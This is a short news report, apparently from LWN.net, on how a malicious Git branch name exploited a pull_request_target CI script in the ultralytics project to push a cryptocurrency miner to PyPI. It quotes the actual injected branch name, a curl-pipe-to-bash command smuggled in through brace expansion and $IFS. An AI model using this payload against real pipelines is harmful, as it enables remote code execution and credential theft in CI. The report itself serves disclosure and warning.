Navigation
Search
|
Abusing Git branch names to compromise a PyPI package
Friday December 6, 2024. 07:44 PM , from LWN.net
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account 'OpenIM Robot' (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash) Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script. This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
https://lwn.net/Articles/1001215/
Related News |
25 sources
Current Date
Dec, Thu 12 - 08:36 CET
|